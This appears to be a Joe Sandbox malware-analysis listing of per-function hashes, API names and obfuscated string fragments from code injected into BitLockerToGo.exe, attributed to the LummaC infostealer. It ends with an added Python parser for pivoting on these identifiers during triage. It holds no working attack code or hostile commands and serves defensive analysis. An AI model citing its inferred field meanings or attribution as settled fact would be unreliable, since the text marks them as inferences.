                                                                                                                  • Instruction Fuzzy Hash: 04212331708215478B2CCE19D89267BF79ADBCE320F09953FDA868B2D1E778D84083E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8d127fdc9f5b745da3b53a35c1f3201024730a9039391a4faf1029988586b4c8
                                                                                                                  • Instruction ID: 758d2329d823db98d8a541574938e83a10420879f4ff71b35d42d77e3208c8ab
                                                                                                                  • Opcode Fuzzy Hash: 8d127fdc9f5b745da3b53a35c1f3201024730a9039391a4faf1029988586b4c8
                                                                                                                  • Instruction Fuzzy Hash: E021F3719093019FD7108F24D8987ABBBE4EB9A714F14993EE48197352C379CC4ACB96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c61014a5e6f122ff9f1b38bddcb439dd125aa4f105d6153f6e84efffed074c1
                                                                                                                  • Instruction ID: c63ce910312ea317fad1948ebc7f5a92f80822efa318bb59d614fba0068a1104
                                                                                                                  • Opcode Fuzzy Hash: 0c61014a5e6f122ff9f1b38bddcb439dd125aa4f105d6153f6e84efffed074c1
                                                                                                                  • Instruction Fuzzy Hash: 7E11043BB382320BE350DE3ADCC45276352EBC622070E4535EA43E3382C636E862D554
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1f3c877fa3897905c8850c77f8631051a8afe10610bc362877d4c4a2e5ddadb8
                                                                                                                  • Instruction ID: e2c26bb9121d6e211a2027aee894ce4d86db0422deb2a883d2929daa05d40d25
                                                                                                                  • Opcode Fuzzy Hash: 1f3c877fa3897905c8850c77f8631051a8afe10610bc362877d4c4a2e5ddadb8
                                                                                                                  • Instruction Fuzzy Hash: DA21F93660C3908FC304CF68A89066BBBE2ABD5354F58C97DE1D557382C674D509CB5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction ID: 5ad9138d0418dea6683ec412d1008d9c2aad4af8272a9ecd7e99d2946a3ce182
                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction Fuzzy Hash: 1D112933A251D04EC3168D3C8440565BFA30A97634F59539AF4F49B2D2D7268D8AC359
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e018d869073fc9f8fa43ec168156d8cc7369c88c4ef1817efe760b3be0bcdf7e
                                                                                                                  • Instruction ID: dde1e6f72a400bd6d51be8e468a33886f8ffb4e05c0bbeccc062e40f8e19d774
                                                                                                                  • Opcode Fuzzy Hash: e018d869073fc9f8fa43ec168156d8cc7369c88c4ef1817efe760b3be0bcdf7e
                                                                                                                  • Instruction Fuzzy Hash: 85210576B08B414FD318CA35D8903677AE3ABDA304F1EC47DD5AA8B782CA79A446C740
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3103a4feb325aeb26cb2b87ca0de2252ea723c0010030174cfc264ee4c6073ca
                                                                                                                  • Instruction ID: 62f4eb9a129cb2622d0713f87bd9d97538c0b8103761e445c3926292cf9809e7
                                                                                                                  • Opcode Fuzzy Hash: 3103a4feb325aeb26cb2b87ca0de2252ea723c0010030174cfc264ee4c6073ca
                                                                                                                  • Instruction Fuzzy Hash: 0B0152B5B0131187DA20AE66A5C5B27E2B89F84B08F98453ED80557342DB7AEC09869D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 14b63e7c5f559039a98fc87325becc06e7aa4c7c04aebbfa1a1c6ab5c7f43090
                                                                                                                  • Instruction ID: 0c548740fe21f1af25db2421896dfdc63c3e0fb8f6bddd5393b1bc29a0946f72
                                                                                                                  • Opcode Fuzzy Hash: 14b63e7c5f559039a98fc87325becc06e7aa4c7c04aebbfa1a1c6ab5c7f43090
                                                                                                                  • Instruction Fuzzy Hash: B4012470F052005BEB215E699D817677327A7DA761F29A13AE4405727BC339CC01C658
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cfa0c90bb1f8422eb66bfc87f69f72b49532905a6a19ff68369fabc0f7b9bac
                                                                                                                  • Instruction ID: e89bded62bf939ca5e9c165c69203de5b046c35fe568ce43d127af32167fe11c
                                                                                                                  • Opcode Fuzzy Hash: 2cfa0c90bb1f8422eb66bfc87f69f72b49532905a6a19ff68369fabc0f7b9bac
                                                                                                                  • Instruction Fuzzy Hash: A5F027F1A0462017DB2689449CC0FB7BB9CCBA7369F090416E8419B242D265588083EA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                  • Instruction ID: 778b8fed6b5eb646648406878ea007d4b5ddcd9983813d35cf93edf296860b99
                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                  • Instruction Fuzzy Hash: 26D05B21509221569B648D1A9400577F7E0E987711F59555FF586D3284E234DC41C56D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 598aa20c43fb88feaa766f574fdc787b1cbef1468dd2943a842930ea76f93f8e
                                                                                                                  • Instruction ID: 48584098cee5cf6c9b2662225f707eaaac6937ed13b4ad37672816aca49925fd
                                                                                                                  • Opcode Fuzzy Hash: 598aa20c43fb88feaa766f574fdc787b1cbef1468dd2943a842930ea76f93f8e
                                                                                                                  • Instruction Fuzzy Hash: CED05EE5D106418BDB08DF50E84582773696A8260DF8A983DE40653203F234E01D8A1E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID: !$+$,$-$0$0$1$2$3$4$5$5$5$8$:$;$<$?$I$J$N$Q$c$l$q$u$w$z
                                                                                                                  • API String ID: 2525500382-3827119089
                                                                                                                  • Opcode ID: e8028504e96c01447a7cd07fad640249513cb4d7ce858c425dcb050b5ab97bbe
                                                                                                                  • Instruction ID: 2077d09fd2abf4de34fc705b00f4d73c97ad3b61c6505aebd331944c99a2a4b8
                                                                                                                  • Opcode Fuzzy Hash: e8028504e96c01447a7cd07fad640249513cb4d7ce858c425dcb050b5ab97bbe
                                                                                                                  • Instruction Fuzzy Hash: 5381A42050CBC189D3228A7C885874FFFD15BA7328F484B9DF5E54B3E2D2A9854AC767
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID: !$+$,$-$0$0$1$2$3$4$5$5$5$8$:$;$<$I$J$N$Q$c$l$q$u$w$z
                                                                                                                  • API String ID: 2525500382-2063723375
                                                                                                                  • Opcode ID: 543cf35ce62da0c0611fad8b13d6099b11e4015da998b60fb1279dc7d8dcf1cc
                                                                                                                  • Instruction ID: d26f66b26cb5db2ea61353f9e6f92556f257390ea162a1987fb8adee52d5c9e0
                                                                                                                  • Opcode Fuzzy Hash: 543cf35ce62da0c0611fad8b13d6099b11e4015da998b60fb1279dc7d8dcf1cc
                                                                                                                  • Instruction Fuzzy Hash: 8081C56041CBC289D322867C884874FFFD15BA7328F581B9DF5E54B3E2C2A9854AC767
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: ?$j$k$l$p$q$t$t
                                                                                                                  • API String ID: 2610073882-675845199
                                                                                                                  • Opcode ID: fcfd223d7692d6bf885c3696c4d9e809cc900c3a497fef6223723d33fcf731f2
                                                                                                                  • Instruction ID: 09b50d42e1b1eecc01dbba5cc5ed3444b7fcbc98f04a8e12bfb69ca513257c0b
                                                                                                                  • Opcode Fuzzy Hash: fcfd223d7692d6bf885c3696c4d9e809cc900c3a497fef6223723d33fcf731f2
                                                                                                                  • Instruction Fuzzy Hash: 1251F52040D7C18AE332DB788858B9FBFD1ABA2224F084B9ED4E95B2D2C7754549C763
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID: !$"$#$%$2$4$C
                                                                                                                  • API String ID: 1927566239-3975892311
                                                                                                                  • Opcode ID: 2fedba33b77c455fe316035b441e0c9daabddb66c0dec94f8709afb57110d96b
                                                                                                                  • Instruction ID: 4f4546ffc5f28aa05d9cb6a276f77c79afe39a1f84e47cccee4278b6cc2b1f78
                                                                                                                  • Opcode Fuzzy Hash: 2fedba33b77c455fe316035b441e0c9daabddb66c0dec94f8709afb57110d96b
                                                                                                                  • Instruction Fuzzy Hash: 3B316C7140C7C48ED33A8B38845A3DABFD0AB9A324F084A5DD5E94B3D2C7B50649D797
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID: [$d$g$m$n
                                                                                                                  • API String ID: 2568140703-2539253441
                                                                                                                  • Opcode ID: a05d4c57d53aafe4507aa6b4e0babcc37262c8cb895939a36f0023029053849a
                                                                                                                  • Instruction ID: 829fe66b493e8a2549bfc4ccf3c791a524893315e88f27edc493aad5d051545f
                                                                                                                  • Opcode Fuzzy Hash: a05d4c57d53aafe4507aa6b4e0babcc37262c8cb895939a36f0023029053849a
                                                                                                                  • Instruction Fuzzy Hash: 1661B632A087914BC7388E2C84513EAB6D2BBDA324F19472DD8EAD73D1DB795C019786
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID: [$d$g$m$n
                                                                                                                  • API String ID: 2568140703-2539253441
                                                                                                                  • Opcode ID: e1e2e31c760a26d7c5abf44a959447e1672dcdee85e199c813d0f1c64a0ef85e
                                                                                                                  • Instruction ID: 9e282d84cd82632bb62c9644fa7e1fa7ed105586502258d5919e28b1497e6a81
                                                                                                                  • Opcode Fuzzy Hash: e1e2e31c760a26d7c5abf44a959447e1672dcdee85e199c813d0f1c64a0ef85e
                                                                                                                  • Instruction Fuzzy Hash: DE61C972A087918FC7398A3C88503EBB7D2ABD9324F19876DD4E9C73D1DA3958019786
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: &$<$>$m
                                                                                                                  • API String ID: 2610073882-178507215
                                                                                                                  • Opcode ID: 7029382f9956752a3c1fd0bba91532cdc52e590f792ef2624961f2a538147185
                                                                                                                  • Instruction ID: 089dbe8d1d2480f48323f9940022ac24e3dc0ff7a7cc8a2a9af20ee4cf7c4a80
                                                                                                                  • Opcode Fuzzy Hash: 7029382f9956752a3c1fd0bba91532cdc52e590f792ef2624961f2a538147185
                                                                                                                  • Instruction Fuzzy Hash: BA41483144C7C2CAD332CA28C418B9FBFD06BA6324F088AADD4E94B7D2D6750046DB63
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: 9$:
                                                                                                                  • API String ID: 2610073882-3810475801
                                                                                                                  • Opcode ID: a2e342ce91eefcd9f724de67794f2ad5bc4e29647a76c3a4e77d0953b6086d56
                                                                                                                  • Instruction ID: 2905d024869000e1db40c519c04c0c68580657e610396e459be5e1da1c07211c
                                                                                                                  • Opcode Fuzzy Hash: a2e342ce91eefcd9f724de67794f2ad5bc4e29647a76c3a4e77d0953b6086d56
                                                                                                                  • Instruction Fuzzy Hash: 41412F3160C7C18ED3328B2C885878BBEE1AB97324F584A9DD8E94B2D2D7B54509C763
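The records above are the Joe Sandbox IDA plugin's per-function metadata for the LummaC code injected at 0x400000 in BitLockerToGo.exe. When triaging several reports of the same family, the useful pivot fields are the API String ID (the listing suggests its first number is derived from the API ID list and its second from the String ID list, so e.g. both AllocString functions share the prefix 2525500382 and the InitializeThunk function, with no strings, ends in -0) and the Opcode ID, which differs even when two functions carry the same API String ID (the two String functions above). The parser below is an added example, not code from Joe Sandbox or from this report; the record layout (one record per "Memory Dump Source" header, bullet fields beneath it) is inferred from the listing, and SAMPLE is a constructed, abridged copy of four of the records above.

```python
"""Pivot on the function records of a Joe Sandbox IDA-plugin listing.

Added example; not code from Joe Sandbox or the report. The record layout
(one record per "Memory Dump Source" header, bullet fields below it) is
inferred from the listing above. SAMPLE is a constructed, abridged copy of
four of those records (Instruction ID / Opcode Fuzzy Hash lines dropped).
"""
import re
from collections import defaultdict

SAMPLE = """\
Memory Dump Source
• Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 14b63e7c5f559039a98fc87325becc06e7aa4c7c04aebbfa1a1c6ab5c7f43090
• Instruction Fuzzy Hash: B4012470F052005BEB215E699D817677327A7DA761F29A13AE4405727BC339CC01C658
Memory Dump Source
• Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cfa0c90bb1f8422eb66bfc87f69f72b49532905a6a19ff68369fabc0f7b9bac
• Instruction Fuzzy Hash: A5F027F1A0462017DB2689449CC0FB7BB9CCBA7369F090416E8419B242D265588083EA
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
• API ID: String
• String ID: [$d$g$m$n
• API String ID: 2568140703-2539253441
• Opcode ID: a05d4c57d53aafe4507aa6b4e0babcc37262c8cb895939a36f0023029053849a
• Instruction Fuzzy Hash: 1661B632A087914BC7388E2C84513EAB6D2BBDA324F19472DD8EAD73D1DB795C019786
Memory Dump Source
• Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
• API ID: String
• String ID: [$d$g$m$n
• API String ID: 2568140703-2539253441
• Opcode ID: e1e2e31c760a26d7c5abf44a959447e1672dcdee85e199c813d0f1c64a0ef85e
• Instruction Fuzzy Hash: DE61C972A087918FC7398A3C88503EBB7D2ABD9324F19876DD4E9C73D1DA3958019786
"""

# "• Field name: value"; the field name never contains a colon, the value may.
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_records(text):
    """Split the listing into one dict per function record (non-bullet lines are ignored)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def split_api_string_id(value):
    """'2994545307-0' -> (2994545307, 0): API-list hash, string-list hash (inferred layout)."""
    api_part, _, string_part = value.partition("-")
    return int(api_part), int(string_part)


def api_hash_table(records):
    """Numeric prefixes the report assigned to each API ID list; expect exactly one per list."""
    table = defaultdict(set)
    for r in records:
        if not r.get("API String ID"):   # functions with no API calls carry an empty ID
            continue
        api_hash, _ = split_api_string_id(r["API String ID"])
        table[r.get("API ID", "")].add(api_hash)
    return {k: sorted(v) for k, v in table.items()}


def shared_api_string_ids(records):
    """API String IDs seen on more than one function: same APIs and strings, different code."""
    by_id = defaultdict(list)
    for r in records:
        if r.get("API String ID"):
            by_id[r["API String ID"]].append(r["Opcode ID"])
    return {k: v for k, v in by_id.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records", api_hash_table(recs), shared_api_string_ids(recs))
```

Functions with no API calls and no strings carry an empty API String ID, so `api_hash_table` skips them rather than trying to split an empty value; `shared_api_string_ids` is the cheap cross-report pivot, since two functions with the same API String ID but different Opcode IDs are the same logical routine compiled or obfuscated differently.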